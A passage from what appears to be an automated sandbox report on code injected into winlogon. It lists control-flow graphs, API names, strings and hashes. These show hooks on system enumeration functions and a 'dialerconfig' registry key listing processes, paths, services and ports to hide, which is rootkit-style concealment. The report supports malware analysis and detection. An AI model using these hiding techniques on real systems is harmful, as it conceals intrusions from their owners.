22323->22315 22325 1e8589b1892 RegCloseKey 22324->22325 22325->22321 22342 1e8589c6168 22327->22342 22329 1e8589b1283 GetProcessHeap 22330 1e8589b12ae _invalid_parameter_noinfo 22329->22330 22330->22284 22332 1e8589b11b5 RegCloseKey 22331->22332 22333 1e8589b10bf 22331->22333 22332->22298 22333->22332 22334 1e8589b10cf RegEnumValueW 22333->22334 22336 1e8589b1125 _invalid_parameter_noinfo __free_lconv_num 22334->22336 22335 1e8589b114e GetProcessHeap 22335->22336 22336->22332 22336->22334 22336->22335 22337 1e8589b116e GetProcessHeap 22336->22337 22337->22336 22338->22301 22339->22307 22340->22311 22341->22317

                          Executed Functions

                          Function 000001E8589B1628 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000042.00000002.3293582923.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_66_2_1e8589b0000_winlogon.jbxd
                          Similarity
                          • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                          • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                          • API String ID: 106492572-2879589442
                          • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                          • Instruction ID: f0632be5b56d1d045c33e69aedb8194d200da67af966bba0f518d50e3ad8fab5
                          • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                          • Instruction Fuzzy Hash: 9171D636324A90CAEB11AF66E8907DDB7A4FF84B89F401126DE4E57B69EF39C444C740
                          Function 000001E8589B3790 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44COMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000042.00000002.3293582923.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_66_2_1e8589b0000_winlogon.jbxd
                          Similarity
                          • API ID: CurrentProcessProtectVirtual$HandleModule
                          • String ID: wr
                          • API String ID: 1092925422-2678910430
                          • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                          • Instruction ID: 5c25a885d6fb7882426ca4c2d651152bb887428ee6332336122a0b4e2170aac2
                          • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                          • Instruction Fuzzy Hash: 51112A367287C1C6EB159B22E4043ADB7A0FB48B86F44003ADE8D07754EF2EC505C704
                          Function 000001E8589B5B30 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 59 1e8589b5b30-1e8589b5b57 60 1e8589b5b6b-1e8589b5b76 GetCurrentThreadId 59->60 61 1e8589b5b59-1e8589b5b68 59->61 62 1e8589b5b82-1e8589b5b89 60->62 63 1e8589b5b78-1e8589b5b7d 60->63 61->60 65 1e8589b5b9b-1e8589b5baf 62->65 66 1e8589b5b8b-1e8589b5b96 call 1e8589b5960 62->66 64 1e8589b5faf-1e8589b5fc6 call 1e8589b7940 63->64 67 1e8589b5bbe-1e8589b5bc4 65->67 66->64 70 1e8589b5c95-1e8589b5cb6 67->70 71 1e8589b5bca-1e8589b5bd3 67->71 77 1e8589b5e1f-1e8589b5e30 call 1e8589b74bf 70->77 78 1e8589b5cbc-1e8589b5cdc GetThreadContext 70->78 74 1e8589b5bd5-1e8589b5c18 call 1e8589b85c0 71->74 75 1e8589b5c1a-1e8589b5c8d call 1e8589b4510 call 1e8589b44b0 call 1e8589b4470 71->75 88 1e8589b5c90 74->88 75->88 91 1e8589b5e35-1e8589b5e3b 77->91 81 1e8589b5ce2-1e8589b5d03 78->81 82 1e8589b5e1a 78->82 81->82 90 1e8589b5d09-1e8589b5d12 81->90 82->77 88->67 94 1e8589b5d92-1e8589b5da3 90->94 95 1e8589b5d14-1e8589b5d25 90->95 96 1e8589b5e41-1e8589b5e98 VirtualProtect FlushInstructionCache 91->96 97 1e8589b5efe-1e8589b5f0e 91->97 103 1e8589b5e15 94->103 104 1e8589b5da5-1e8589b5dc3 94->104 99 1e8589b5d27-1e8589b5d3c 95->99 100 1e8589b5d8d 95->100 101 1e8589b5e9a-1e8589b5ea4 96->101 102 1e8589b5ec9-1e8589b5ef9 call 1e8589b78ac 96->102 106 1e8589b5f10-1e8589b5f17 97->106 107 1e8589b5f1e-1e8589b5f2a call 1e8589b4df0 97->107 99->100 109 1e8589b5d3e-1e8589b5d88 call 1e8589b3970 SetThreadContext 99->109 100->103 101->102 110 1e8589b5ea6-1e8589b5ec1 call 1e8589b4390 101->110 102->91 104->103 112 1e8589b5dc5-1e8589b5e0c call 1e8589b3900 104->112 106->107 113 1e8589b5f19 call 1e8589b43e0 106->113 120 1e8589b5f2f-1e8589b5f35 107->120 109->100 110->102 112->103 126 1e8589b5e10 call 1e8589b74dd 112->126 113->107 124 1e8589b5f77-1e8589b5f95 120->124 125 1e8589b5f37-1e8589b5f75 ResumeThread call 1e8589b78ac 120->125 128 1e8589b5f97-1e8589b5fa6 124->128 129 1e8589b5fa9 124->129 125->120 126->103 128->129 129->64
                          APIs
                          Memory Dump Source
                          • Source File: 00000042.00000002.3293582923.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_66_2_1e8589b0000_winlogon.jbxd
                          Similarity
                          • API ID: Thread$Current$Context
                          • String ID:
                          • API String ID: 1666949209-0
                          • Opcode ID: 1583aff86c60747e20c7fd7e292354d5b69db1aa669fd640e36c9be7a05cd15b
                          • Instruction ID: 5d1d641fdfe7a921bc40b2274792ee65e942fd43df3d51391b1333f61c708ac4
                          • Opcode Fuzzy Hash: 1583aff86c60747e20c7fd7e292354d5b69db1aa669fd640e36c9be7a05cd15b
                          • Instruction Fuzzy Hash: 06D18976219B88C6DB709B46E49439EB7A1F7C8B85F100227EE8D47BA5DF38C551CB40
                          Function 000001E8589B50D0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 131 1e8589b50d0-1e8589b50fc 132 1e8589b50fe-1e8589b5106 131->132 133 1e8589b510d-1e8589b5116 131->133 132->133 134 1e8589b5127-1e8589b5130 133->134 135 1e8589b5118-1e8589b5120 133->135 136 1e8589b5132-1e8589b513a 134->136 137 1e8589b5141-1e8589b514a 134->137 135->134 136->137 138 1e8589b5156-1e8589b5161 GetCurrentThreadId 137->138 139 1e8589b514c-1e8589b5151 137->139 141 1e8589b5163-1e8589b5168 138->141 142 1e8589b516d-1e8589b5174 138->142 140 1e8589b56d3-1e8589b56da 139->140 141->140 143 1e8589b5181-1e8589b518a 142->143 144 1e8589b5176-1e8589b517c 142->144 145 1e8589b5196-1e8589b51a2 143->145 146 1e8589b518c-1e8589b5191 143->146 144->140 147 1e8589b51a4-1e8589b51c9 145->147 148 1e8589b51ce-1e8589b5225 call 1e8589b56e0 * 2 145->148 146->140 147->140 153 1e8589b5227-1e8589b522e 148->153 154 1e8589b523a-1e8589b5243 148->154 155 1e8589b5230 153->155 156 1e8589b5236 153->156 157 1e8589b5255-1e8589b525e 154->157 158 1e8589b5245-1e8589b5252 154->158 159 1e8589b52b0-1e8589b52b6 155->159 160 1e8589b52a6-1e8589b52aa 156->160 161 1e8589b5273-1e8589b5298 call 1e8589b7870 157->161 162 1e8589b5260-1e8589b5270 157->162 158->157 163 1e8589b52e5-1e8589b52eb 159->163 164 1e8589b52b8-1e8589b52d4 call 1e8589b4390 159->164 160->159 170 1e8589b529e 161->170 171 1e8589b532d-1e8589b5342 call 1e8589b3cc0 161->171 162->161 168 1e8589b5315-1e8589b5328 163->168 169 1e8589b52ed-1e8589b530c call 1e8589b78ac 163->169 164->163 174 1e8589b52d6-1e8589b52de 164->174 168->140 169->168 170->160 178 1e8589b5351-1e8589b535a 171->178 179 1e8589b5344-1e8589b534c 171->179 174->163 180 1e8589b536c-1e8589b53ba call 1e8589b8c60 178->180 181 1e8589b535c-1e8589b5369 178->181 179->160 184 1e8589b53c2-1e8589b53ca 180->184 181->180 185 1e8589b53d0-1e8589b54bb call 1e8589b7440 184->185 186 1e8589b54d7-1e8589b54df 184->186 198 1e8589b54bf-1e8589b54ce call 1e8589b4060 185->198 199 1e8589b54bd 185->199 187 1e8589b5523-1e8589b552b 186->187 188 1e8589b54e1-1e8589b54f4 call 1e8589b4590 186->188 191 1e8589b5537-1e8589b5546 187->191 192 1e8589b552d-1e8589b5535 187->192 200 1e8589b54f6 188->200 201 1e8589b54f8-1e8589b5521 188->201 196 1e8589b5548 191->196 197 1e8589b554f 191->197 192->191 195 1e8589b5554-1e8589b5561 192->195 203 1e8589b5563 195->203 204 1e8589b5564-1e8589b55b9 call 1e8589b85c0 195->204 196->197 197->195 208 1e8589b54d2 198->208 209 1e8589b54d0 198->209 199->186 200->187 201->186 203->204 210 1e8589b55bb-1e8589b55c3 204->210 211 1e8589b55c8-1e8589b5661 call 1e8589b4510 call 1e8589b4470 VirtualProtect 204->211 208->184 209->186 216 1e8589b5663-1e8589b5668 GetLastError 211->216 217 1e8589b5671-1e8589b56d1 211->217 216->217 217->140
                          APIs
                          Memory Dump Source
                          • Source File: 00000042.00000002.3293582923.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_66_2_1e8589b0000_winlogon.jbxd
                          Similarity
                          • API ID: CurrentThread
                          • String ID:
                          • API String ID: 2882836952-0
                          • Opcode ID: 6db5c12ccb82f3d6f97d4eb5dd3bfd24aa6d026fde54f3ba11af0dc7faceaf78
                          • Instruction ID: 540203665ef2c2292df768c22022c8278d109779f1dd1d0b06d3c86d73575d79
                          • Opcode Fuzzy Hash: 6db5c12ccb82f3d6f97d4eb5dd3bfd24aa6d026fde54f3ba11af0dc7faceaf78
                          • Instruction Fuzzy Hash: 1302A53622DBC4CAEB60CB55E49439EF7A1F784795F104126EA8E87BA9DF78C454CB00
                          Function 000001E8589B39E0 Relevance: 4.6, APIs: 3, Instructions: 64memoryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                          Memory Dump Source
                          • Source File: 00000042.00000002.3293582923.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_66_2_1e8589b0000_winlogon.jbxd
                          Similarity
                          • API ID: Virtual$AllocQuery
                          • String ID:
                          • API String ID: 31662377-0
                          • Opcode ID: ad31f8c641c3994e4c662b42b06090e17ab0b09933d29211a4965d6dca603ca4
                          • Instruction ID: 09cf3f19013970cc5edba0ff51850c5c12277f20bdc89c750177569444b008a5
                          • Opcode Fuzzy Hash: ad31f8c641c3994e4c662b42b06090e17ab0b09933d29211a4965d6dca603ca4
                          • Instruction Fuzzy Hash: BC31F13222DAC4C9EA70DA15E45539EF6E4FB88785F200536E9CD46BA9DF7CC5409B04
                          Function 000001E8589B328C Relevance: 4.5, APIs: 3, Instructions: 43threadCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                          Memory Dump Source
                          • Source File: 00000042.00000002.3293582923.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_66_2_1e8589b0000_winlogon.jbxd
                          Similarity
                          • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                          • String ID:
                          • API String ID: 1683269324-0
                          • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                          • Instruction ID: d7f8704d464420a2ce37a06b3bc325ee32576ad6341c0f5012ed89367f689b04
                          • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                          • Instruction Fuzzy Hash: 431180306386C1CAFB60EB62F9493DEF2D4AF54346F94413F9D0E81595EF79D4449600
                          Function 000001E8589B4DF0 Relevance: 4.5, APIs: 3, Instructions: 23memoryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                          Memory Dump Source
                          • Source File: 00000042.00000002.3293582923.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_66_2_1e8589b0000_winlogon.jbxd
                          Similarity
                          • API ID: CacheCurrentFlushInstructionProcessProtectVirtual
                          • String ID:
                          • API String ID: 3733156554-0
                          • Opcode ID: b4082a11bd8fc7a0e50fa8074e04b9b5eee935061857b93c3988384488003b51
                          • Instruction ID: 22019e5aebe169b3d70db300553c4eca4bdb0326af0d5ecbc3d97933e7c21ec8
                          • Opcode Fuzzy Hash: b4082a11bd8fc7a0e50fa8074e04b9b5eee935061857b93c3988384488003b51
                          • Instruction Fuzzy Hash: 50F0BD76228A84C5D6309B45E45179EFBA1EB88BE5F144126BE8D47B69CE38C5908B40
                          Function 000001E85898273C Relevance: 3.2, APIs: 2, Instructions: 187memorylibraryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 265 1e85898273c-1e8589827a4 call 1e8589829d4 * 4 274 1e8589829b2 265->274 275 1e8589827aa-1e8589827ad 265->275 277 1e8589829b4-1e8589829d0 274->277 275->274 276 1e8589827b3-1e8589827b6 275->276 276->274 278 1e8589827bc-1e8589827bf 276->278 278->274 279 1e8589827c5-1e8589827e6 VirtualAlloc 278->279 279->274 280 1e8589827ec-1e85898280c 279->280 281 1e858982838-1e85898283f 280->281 282 1e85898280e-1e858982836 280->282 283 1e858982845-1e858982852 281->283 284 1e8589828df-1e8589828e6 281->284 282->281 282->282 283->284 287 1e858982858-1e85898286a LoadLibraryA 283->287 285 1e858982992-1e8589829b0 284->285 286 1e8589828ec-1e858982901 284->286 285->277 286->285 288 1e858982907 286->288 289 1e8589828ca-1e8589828d2 287->289 290 1e85898286c-1e858982878 287->290 293 1e85898290d-1e858982921 288->293 289->287 291 1e8589828d4-1e8589828d9 289->291 294 1e8589828c5-1e8589828c8 290->294 291->284 296 1e858982982-1e85898298c 293->296 297 1e858982923-1e858982934 293->297 294->289 295 1e85898287a-1e85898287d 294->295 301 1e8589828a7-1e8589828b7 295->301 302 1e85898287f-1e8589828a5 295->302 296->285 296->293 299 1e858982936-1e85898293d 297->299 300 1e85898293f-1e858982943 297->300 303 1e858982970-1e858982980 299->303 304 1e858982945-1e85898294b 300->304 305 1e85898294d-1e858982951 300->305 306 1e8589828ba-1e8589828c1 301->306 302->306 303->296 303->297 304->303 308 1e858982963-1e858982967 305->308 309 1e858982953-1e858982961 305->309 306->294 308->303 310 1e858982969-1e85898296c 308->310 309->303 310->303
                          APIs
                          Memory Dump Source
                          • Source File: 00000042.00000002.3293552405.000001E858980000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_66_2_1e858980000_winlogon.jbxd
                          Similarity
                          • API ID: AllocLibraryLoadVirtual
                          • String ID:
                          • API String ID: 3550616410-0
                          • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                          • Instruction ID: 54f6f79a6e3174aa67926fcea571029873fefd45f025aae229484734b2b22b08
                          • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                          • Instruction Fuzzy Hash: B461DD32B21692CBDB548F95D2007ADF3A2FB54BA4F588136DE5E07788DE39D852CB00
                          Function 000001E8589B1ABC Relevance: 3.1, APIs: 2, Instructions: 68sleepCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                            • Part of subcall function 000001E8589B1628: GetProcessHeap.KERNEL32 ref: 000001E8589B1633
                            • Part of subcall function 000001E8589B1628: HeapAlloc.KERNEL32 ref: 000001E8589B1642
                            • Part of subcall function 000001E8589B1628: RegOpenKeyExW.ADVAPI32 ref: 000001E8589B16B2
                            • Part of subcall function 000001E8589B1628: RegOpenKeyExW.ADVAPI32 ref: 000001E8589B16DF
                            • Part of subcall function 000001E8589B1628: RegCloseKey.ADVAPI32 ref: 000001E8589B16F9
                            • Part of subcall function 000001E8589B1628: RegOpenKeyExW.ADVAPI32 ref: 000001E8589B1719
                            • Part of subcall function 000001E8589B1628: RegCloseKey.ADVAPI32 ref: 000001E8589B1734
                            • Part of subcall function 000001E8589B1628: RegOpenKeyExW.ADVAPI32 ref: 000001E8589B1754
                            • Part of subcall function 000001E8589B1628: RegCloseKey.ADVAPI32 ref: 000001E8589B176F
                            • Part of subcall function 000001E8589B1628: RegOpenKeyExW.ADVAPI32 ref: 000001E8589B178F
                            • Part of subcall function 000001E8589B1628: RegCloseKey.ADVAPI32 ref: 000001E8589B17AA
                            • Part of subcall function 000001E8589B1628: RegOpenKeyExW.ADVAPI32 ref: 000001E8589B17CA
                          • Sleep.KERNEL32 ref: 000001E8589B1AD7
                          • SleepEx.KERNELBASE ref: 000001E8589B1ADD
                            • Part of subcall function 000001E8589B1628: RegCloseKey.ADVAPI32 ref: 000001E8589B17E5
                            • Part of subcall function 000001E8589B1628: RegOpenKeyExW.ADVAPI32 ref: 000001E8589B1805
                            • Part of subcall function 000001E8589B1628: RegCloseKey.ADVAPI32 ref: 000001E8589B1820
                            • Part of subcall function 000001E8589B1628: RegOpenKeyExW.ADVAPI32 ref: 000001E8589B1840
                            • Part of subcall function 000001E8589B1628: RegCloseKey.ADVAPI32 ref: 000001E8589B185B
                            • Part of subcall function 000001E8589B1628: RegOpenKeyExW.ADVAPI32 ref: 000001E8589B187B
                            • Part of subcall function 000001E8589B1628: RegCloseKey.ADVAPI32 ref: 000001E8589B1896
                            • Part of subcall function 000001E8589B1628: RegCloseKey.ADVAPI32 ref: 000001E8589B18A0
                          Memory Dump Source
                          • Source File: 00000042.00000002.3293582923.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_66_2_1e8589b0000_winlogon.jbxd
                          Similarity
                          • API ID: CloseOpen$HeapSleep$AllocProcess
                          • String ID:
                          • API String ID: 1534210851-0
                          • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                          • Instruction ID: 06e8169f9804a98201475c8f763f238f1302acfb2d082d9a4a6838d138c42db4
                          • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                          • Instruction Fuzzy Hash: 9C31F9712296D5CAEB54BB66DA453FDB3A8AF84BC2F1454339E0D8729AFE20C8518210
                          Function 000001E8589E273C Relevance: 1.4, APIs: 1, Instructions: 187memoryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 350 1e8589e273c-1e8589e27a4 call 1e8589e29d4 * 4 359 1e8589e29b2 350->359 360 1e8589e27aa-1e8589e27ad 350->360 362 1e8589e29b4-1e8589e29d0 359->362 360->359 361 1e8589e27b3-1e8589e27b6 360->361 361->359 363 1e8589e27bc-1e8589e27bf 361->363 363->359 364 1e8589e27c5-1e8589e27e6 VirtualAlloc 363->364 364->359 365 1e8589e27ec-1e8589e280c 364->365 366 1e8589e280e-1e8589e2836 365->366 367 1e8589e2838-1e8589e283f 365->367 366->366 366->367 368 1e8589e2845-1e8589e2852 367->368 369 1e8589e28df-1e8589e28e6 367->369 368->369 372 1e8589e2858-1e8589e286a 368->372 370 1e8589e2992-1e8589e29b0 369->370 371 1e8589e28ec-1e8589e2901 369->371 370->362 371->370 373 1e8589e2907 371->373 379 1e8589e286c-1e8589e2878 372->379 380 1e8589e28ca-1e8589e28d2 372->380 375 1e8589e290d-1e8589e2921 373->375 377 1e8589e2982-1e8589e298c 375->377 378 1e8589e2923-1e8589e2934 375->378 377->370 377->375 383 1e8589e2936-1e8589e293d 378->383 384 1e8589e293f-1e8589e2943 378->384 385 1e8589e28c5-1e8589e28c8 379->385 380->372 381 1e8589e28d4-1e8589e28d9 380->381 381->369 387 1e8589e2970-1e8589e2980 383->387 388 1e8589e2945-1e8589e294b 384->388 389 1e8589e294d-1e8589e2951 384->389 385->380 386 1e8589e287a-1e8589e287d 385->386 390 1e8589e28a7-1e8589e28b7 386->390 391 1e8589e287f-1e8589e28a5 386->391 387->377 387->378 388->387 392 1e8589e2963-1e8589e2967 389->392 393 1e8589e2953-1e8589e2961 389->393 394 1e8589e28ba-1e8589e28c1 390->394 391->394 392->387 395 1e8589e2969-1e8589e296c 392->395 393->387 394->385 395->387
                          APIs
                          Memory Dump Source
                          • Source File: 00000042.00000002.3293641040.000001E8589E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E8589E0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_66_2_1e8589e0000_winlogon.jbxd
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                          • Instruction ID: baa815a1b03312b63bd3d1551ce62b2d561b23967e9983693c765027a066309d
                          • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                          • Instruction Fuzzy Hash: 5E61DD72B21690C7EB548F95D1407ADFBA2FB54BA4F589132EE5D07788DE38D862C700

                          Non-executed Functions

                          Function 000001E8589B2B2C Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264stringlibraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000042.00000002.3293582923.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_66_2_1e8589b0000_winlogon.jbxd
                          Similarity
                          • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                          • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                          • API String ID: 2119608203-3850299575
                          • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                          • Instruction ID: 66d3cc7fa703628ffd88a958204c6c3eae92163f900264158483d38a9f943711
                          • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                          • Instruction Fuzzy Hash: 31B14732228AD0CAEBA59FA6D8507EDF3A5FB84B86F445027EE0D57B94DE75C840C740
                          Function 000001E8589B7D90 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000042.00000002.3293582923.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_66_2_1e8589b0000_winlogon.jbxd
                          Similarity
                          • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                          • String ID:
                          • API String ID: 3140674995-0
                          • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                          • Instruction ID: d4e1efc638050b926f9574cf9333cc024f10501de906563db633245b72e59a7c
                          • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                          • Instruction Fuzzy Hash: 6C313B76229BC0DAEB609F60E8807EDB764FB84745F44452ADE4E57B98EF38C648C710
                          Function 000001E8589BD2A4 Relevance: 9.1, APIs: 6, Instructions: 83COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000042.00000002.3293582923.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_66_2_1e8589b0000_winlogon.jbxd
                          Similarity
                          • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                          • String ID:
                          • API String ID: 1239891234-0
                          • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                          • Instruction ID: fe4fedf686d99ec42a62814e82a9535f6f48c61b48166fa88bd6cf84dd123d16
                          • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                          • Instruction Fuzzy Hash: D4314E36224BC0DAEB649F25E8403EEB7A4FB89755F50012AEE9D53B55DF38C545CB00
                          Function 000001E8589B12BC Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000042.00000002.3293582923.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_66_2_1e8589b0000_winlogon.jbxd
                          Similarity
                          • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                          • String ID: d
                          • API String ID: 2005889112-2564639436
                          • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                          • Instruction ID: c7e4212cc5d13ccfdc5b6c4001ea65b39e9a5bd1eb85d2e12a93a934f0025c5e
                          • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                          • Instruction Fuzzy Hash: 83512B76224BC4CAEB55DF62E54439EBBA1FB89B96F04413ADE4907758DF39C0458700
                          Function 000001E8589B1D14 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65threadCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000042.00000002.3293582923.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_66_2_1e8589b0000_winlogon.jbxd
                          Similarity
                          • API ID: CurrentThread$AddressHandleModuleProc
                          • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                          • API String ID: 4175298099-1975688563
                          • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                          • Instruction ID: 307e4caf8f773ededbd49a1d779e4008e5bf6fc61e17ee7f67eba446ce0af824
                          • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                          • Instruction Fuzzy Hash: B131A274535ACAE4EA05EFA5EC527ECF720FF84346F8040739C1D125669F79864AC750
                          Function 000001E8589E6910 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 230COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 571 1e8589e6910-1e8589e6916 572 1e8589e6951-1e8589e695b 571->572 573 1e8589e6918-1e8589e691b 571->573 574 1e8589e6a78-1e8589e6a8d 572->574 575 1e8589e6945-1e8589e6984 call 1e8589e6fc0 573->575 576 1e8589e691d-1e8589e6920 573->576 580 1e8589e6a8f 574->580 581 1e8589e6a9c-1e8589e6ab6 call 1e8589e6e54 574->581 593 1e8589e6a52 575->593 594 1e8589e698a-1e8589e699f call 1e8589e6e54 575->594 578 1e8589e6922-1e8589e6925 576->578 579 1e8589e6938 __scrt_dllmain_crt_thread_attach 576->579 584 1e8589e6927-1e8589e6930 578->584 585 1e8589e6931-1e8589e6936 call 1e8589e6f04 578->585 582 1e8589e693d-1e8589e6944 579->582 586 1e8589e6a91-1e8589e6a9b 580->586 591 1e8589e6aef-1e8589e6b20 call 1e8589e7190 581->591 592 1e8589e6ab8-1e8589e6aed call 1e8589e6f7c call 1e8589e6e1c call 1e8589e7318 call 1e8589e7130 call 1e8589e7154 call 1e8589e6fac 581->592 585->582 603 1e8589e6b22-1e8589e6b28 591->603 604 1e8589e6b31-1e8589e6b37 591->604 592->586 597 1e8589e6a54-1e8589e6a69 593->597 606 1e8589e69a5-1e8589e69b6 call 1e8589e6ec4 594->606 607 1e8589e6a6a-1e8589e6a77 call 1e8589e7190 594->607 603->604 608 1e8589e6b2a-1e8589e6b2c 603->608 609 1e8589e6b7e-1e8589e6b94 call 1e8589e268c 604->609 610 1e8589e6b39-1e8589e6b43 604->610 624 1e8589e6a07-1e8589e6a11 call 1e8589e7130 606->624 625 1e8589e69b8-1e8589e69dc call 1e8589e72dc call 1e8589e6e0c call 1e8589e6e38 call 1e8589eac0c 606->625 607->574 614 1e8589e6c1f-1e8589e6c2c 608->614 632 1e8589e6b96-1e8589e6b98 609->632 633 